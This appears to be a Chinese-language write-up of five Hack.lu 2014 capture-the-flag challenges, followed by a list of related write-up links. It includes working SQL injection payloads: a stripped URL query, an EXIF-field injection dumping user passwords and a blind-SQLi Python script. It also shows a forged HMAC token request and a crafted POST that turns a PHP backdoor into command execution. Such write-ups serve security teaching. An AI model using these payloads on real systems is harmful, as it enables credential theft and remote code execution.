Hack.lu 2014 Writeup
0x00 Web 50 Encrypted
Category: Web
Points: 50
Author: TheJH
Description:
Legend says there is a bank vault in Jamestown which cannot be broken
into. The only way inside is through an authentication process. Even
Jesse James and his companions failed to break the security of this
particular bank. Can you do it?
能看到一個登入表單,使用使用者名稱a和密碼b登入,看到了連結變成
https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG+%60anzr%60+SEBZ+%60hfref%60+JURER+%60anzr%60+%3D+%27n%27+NAQ+%60cnffjbeq%60+%3D+ZQ5%28%27o%27%29
#!bash
In [22]: hackercodecs.rotx(hackercodecs.urlunquote(a),13)
Out[22]: u"query=SELECT+`name`+FROM+`users`+WHERE+`name`+=+'a'+AND+`password`+=+MD5('b')"
去掉後半部分,直接訪問:
#!bash
DeAdCaT___$ curl 'https://wildwildweb.fluxfingers.net:1411/dologin.php?dhrel=FRYRPG%20%60anzr%60%20SEBZ%20%60hfref%60'
#!html
<!DOCTYPE html>
<html>
<head>
<title>Encrypted Login</title>
</head>
<body>
<h1>Encrypted Login</h1>
Hello admin! The flag is flag{nobody_needs_server_side_validation}. </body>
</html>
0x01 Web 200 ImageUpload
Category: Web Points: 200 Author: SLAZ Description: In the Wild Wild Web, there are really bad guys. The sheriff doesn’t know them all.
Therefore, he needs your help. Upload pictures of criminals to this site and help the sheriff to arrest them. You can make this Wild Wild Web much less wild!!! Pictures will be deleted on regular basis! Hint: Bruteforce is not necessary to solve the challenge!!! Please don’t do this. https://wildwildweb.fluxfingers.net:1421/
當你登入之後,你能看到一個上傳圖片的表單和一個Login,上傳了一個小辣椒之後,伺服器生成了這麼一個圖片,並且下方還有一個表格。
我一開始總覺得是要繞過gd的壓縮,在各種調教之前的一個繞過gd壓縮的程式碼。後來這個題被凱神秒了,他說這是個exif注入。
於是後來玩了一下,用exiftool。
最終的payload圖片的部分exif資訊
#!bash
DeAdCaT-2:hack.lu2014 DeAdCaT___$ exiftool test.jpg
ExifTool Version Number : 9.60
File Name : test.jpg
Directory : .
File Size : 7.2 kB
Artist : asd','nidaye',(select group_concat(id,0x3a,name,0x3a,password) from users)) #
在Model處出現資料:
#!bash
1:sheriff:AO7eikkOCucCFJOyyaaQ,2:deputy:testpw
然後Login,獲得fLag。
You are sucessfully logged in.
Flag: flag{1_5h07_7h3_5h3r1ff}
0x02 Crypto 150 Hidden in ρlaιn sιght
Category: Crypto
Points: 150
Author: TheJH
Description: At our software development company, one of the top developers left in anger. He told us that he had hidden a backdoor in our node.js server application — he thinks that we can’t find it even if we try. I have attached the source code of our fileserver. After registration, you can log in, upload files and create access tokens for your files that others can use to retrieve them. He must have added some way to retrieve files without permission. And we don’t have version control, so we can’t just check his last commits. We have read the source code multiple times, but just can’t figure out how he did it. Maybe he just lied? Can you help us and demonstrate how the backdoor works? We have uploaded a file to testuser/files/flag.txt – please try to retrieve it. Connect to https://wildwildweb.fluxfingers.net:1409/. Note that all your files will be purged every 5 minutes. You can download the service code here: Download
一開始以為是密碼題,後來發現是隱寫。。。。(機智的lym
一個圖片說明問題:
0x03 crypto150
下面那個長的像拉長的E的東西是
\u0395
也就是說:
HMAC_SECRET = ''
用python:
#!bash
In [76]: hmac.new('','testuser/flag.txt',hashlib.sha256).hexdigest()
Out[76]: '4a332c7f27909f85a529393cea72301393f84cf5908aa2538137776f78624db4'
DeAdCaT___$ curl https://wildwildweb.fluxfingers.net:1409/files/testuser/flag.txt/4a332c7f27909f85a529393cea72301393f84cf5908aa2538137776f78624db4
flag{unicode_stego_is_best_stego}
0x04 Web 200 Killy The Bit
Category: Web
Points: 200
Author: understrich
Description: Killy the Bit is one of the dangerous kittens of the wild west. He already flipped bits in most of the states and recently hacked the Royal Bank of Fluxembourg (https://wildwildweb.fluxfingers.net:1424/). All customer of the bank are now advised to change their password for the next release of the bank’s website which will be launched on the 23.10.2014 10:01 CEST. Killy the Bit stands in your debt and sent the following link https://wildwildweb.fluxfingers.net:1424/index.phps. Can you break the password generation process in order to get access to the admin account? Hint: The challenge won’t actually send emails — just concentrate on the website! Hint: The password’s column name is passwd. Hint: Blind SQLi is not a good solution. You can get the correct and complete flag with one single request!
狗我比較弱,用的盲注:
#!python
import requests
def binary_sqli(left, right, index):
while 1:
mid = (left + right)/2
if mid == left:
print chr(mid)
return chr(mid)
break
payload = "' union select name,email from user where name = if(ascii(substr((select passwd from user where name='admin'),%s,1))<%s,'admin','root')%%23" % (str(index), str(mid))
url = 'https://wildwildweb.fluxfingers.net:1424/?name=' + payload + '&submit=Generate'
r = requests.get(url)
tmp = r.text
if len(tmp) < 480:
right = mid
else:
left = mid
if __name__ == '__main__':
ans = ''
for i in range(1,65):
ans += binary_sqli(35, 127, i)
print ans
拿到了flag:
flag{Killy_The_Bit_Is_Wanted_for_9000_$$_FoR_FlipPing_Bits}
更優雅的一句話get flag:
#!bash
DeAdCaT___$ http https://wildwildweb.fluxfingers.net:1424/?name=adm%27%20UNION%20select%20passwd,2%20from%20user%20where%20name=%27admin%27%20LIMIT%201,2%23&submit=Generate#
[1] 49939
DeAdCaT-2:longest-common-prefix DeAdCaT___$ HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Tue, 28 Oct 2014 08:31:24 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: nginx
Set-Cookie: PHPSESSID=qk9aod6reqkf8f2c17qhdo1dl2; path=/
Transfer-Encoding: chunked
X-Powered-By: PHP/5.5.9-1ubuntu4.4
<html><head><style type='text/css'><!-- body {background-image: url(bg.jpg);background-repeat: no-repeat;height: Percent;width: Percent; background-size: cover;}//--></style> <title>Royal Bank of Fluxembourg</title></head></html><!--
Single cows are waiting for you
_____________________
|I'm a hot single cow!|
---------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
-->We couldn't find your username, but it sounds like this user:<br>flag{Killy_The_Bit_Is_Wanted_for_9000_$$_FoR_FlipPing_Bits}<br>
SQL語句不夠溜啊QAQ
0x05 Web 200 Next Global Backdoor
Category: Web
Points: 150
Author: reiners
Description: J0nas is a simple man. He specializes in only one thing: Building the most beautiful back doors that you’ve ever seen. This gem was used in multiple saloons, letting only the most skilled c0wb0ys pass. https://wildwildweb.fluxfingers.net:1425/index.php index.phps
#!php
<?php
$v1 = next(neXt(${'next'}['next']))
// step 1
// @$GLOBALS=$GLOBALS{next}=next($GLOBALS{'GLOBALS'})[$GLOBALS['next']['next']=next($GLOBALS)['GLOBALS']][$next['GLOBALS']=next($GLOBALS[GLOBALS]['GLOBALS'])[$next['next']]][$next['GLOBALS']=next($next['GLOBALS'])][$GLOBALS[next]['next']($GLOBALS['next']{'GLOBALS'})]=$v1;
// step 2 globals next += 1
//@$GLOBALS=$GLOBALS{next}=$_POST[$GLOBALS['next']['next']=next($GLOBALS)['GLOBALS']][$next['GLOBALS']=next($GLOBALS[GLOBALS]['GLOBALS'])[$next['next']]][$next['GLOBALS']=next($next['GLOBALS'])][$GLOBALS[next]['next']($GLOBALS['next']{'GLOBALS'})]=$v1;
// step 3 globals next += 1
// $v2 = $next['next']=$_COOKIE['GLOBALS'];
// @$GLOBALS=$GLOBALS{next}=$_POST[$v2][$next['GLOBALS']=next($GLOBALS[GLOBALS]['GLOBALS'])[$next['next']]][$next['GLOBALS']=next($next['GLOBALS'])][$GLOBALS[next]['next']($GLOBALS['next']{'GLOBALS'})]=$v1;
// step 4 globals next += 1
// $GLOBALS[GLOBALS]['GLOBALS'] = $GLOBALS
// $v2 = $next['next']=$_COOKIE['GLOBALS'];
// $v3 = $next['GLOBALS']=$_FILES[$v2]
// @$GLOBALS=$GLOBALS{next}=$_POST[$v2][$v3][$next['GLOBALS']=next($next['GLOBALS'])][$GLOBALS[next]['next']($GLOBALS['next']{'GLOBALS'})]=$v1;
// step 5
// $v2 = $next['next']=$_COOKIE['GLOBALS'];
// $v3 = $next['GLOBALS']=$_FILES[$v2];
// next($_FILE) = $_FILES[$v2]['type']
// $v4 = $next['GLOBALS']=$_FILES[$v2]['type'];
// @$GLOBALS=$GLOBALS{next}=$_POST[$v2][$v3][$v4][$GLOBALS[next]['next']($GLOBALS['next']{'GLOBALS'})]=$v1;
// step 6
$v2 = $next['next']=$_COOKIE['GLOBALS'];
$v3 = $next['GLOBALS']=$_FILES[$v2];
$v4 = $next['GLOBALS']=$_FILES[$v2]['type'];
@$GLOBALS=$GLOBALS{next}=$_POST[$v2][$v3][$v4][$_COOKIE['GLOBALS']($_FILES[$v2]['type'])]=$v1;
?>
構造資料包:
#!bash
POST /index.php HTTP/1.1
Host: wildwildweb.fluxfingers.net:1425
Content-Length: 1325
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryePkpFF7tjBAqx29L
Cookie: GLOBALS=system
------WebKitFormBoundaryePkpFF7tjBAqx29L
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryePkpFF7tjBAqx29L
Content-Disposition: form-data; name="ls"; filename="hello.o"
Content-Type: ls
<file data>
------WebKitFormBoundaryePkpFF7tjBAqx29L———
最後cat /flag.txt即可。
flag{backdoor_business_is_hard,_fella}
相關文章
- Alictf2014 Writeup2020-08-19TF2
- SSCTF Writeup2020-08-19
- JCTF Writeup2020-08-19
- BCTF Writeup2020-08-19
- HCTF writeup(web)2020-08-19Web
- wargame narnia writeup2020-08-19GAM
- 太湖杯writeup2020-11-22
- Wargama-leviathan Writeup2020-08-19GAM
- 0ctf writeup2020-08-19
- 360hackgame writeup2020-08-19GAM
- web_ping的writeup2018-08-19Web
- xss挑戰賽writeup2020-08-19
- CTF——WriteUp(2020招新)2020-11-04
- guestbook(hackme web部分writeup)2020-10-31Web
- 三道MISC的writeup2022-12-08
- POI20142024-05-01
- POI 2014 Couriers2020-10-03
- CoolShell解密遊戲的WriteUp2020-08-19解密遊戲
- CTFSHOW-WEB入門 writeup2020-09-29Web
- 2020湖湘杯部分writeup2020-11-02
- BZOJ3877 : [Ahoi2014&Jsoi2014]保齡球2018-03-09JS
- ISG2014 Writeups2020-08-19
- Web_Bugku_WriteUp | 變數12024-03-17Web變數
- cmseasy&內網滲透 Writeup2021-08-19內網
- CTF-safer-than-rot13-writeup2021-07-20
- Flare-on5 Challenge6 magic -Writeup2018-09-20
- 無聲杯 xss 挑戰賽 writeup2020-08-19
- 31C3 CTF web關writeup2020-08-19Web
- Misc_BUUCTF_WriteUp | 面具下的flag2024-10-30
- 【阿菜Writeup】Security Innovation Smart Contract CTF2021-08-26
- [CERC2014] Virus synthesis2019-01-03
- NEERC2014題解2024-09-29
- bzoj3875: [Ahoi2014&Jsoi2014]騎士遊戲(spfa+Dp)2018-03-20JS遊戲
- cad2014序列號和金鑰大全 cad2014序列號和金鑰分享2022-01-15
- 網鼎杯-writeup-第二場-babyRSA2018-08-24
- XSS挑戰第一期Writeup2020-08-19
- XSS挑戰第二期 Writeup2020-08-19
- buuoj[ACTF_Junior_2020]Splendid_MineCraft WriteUp2020-10-26Raft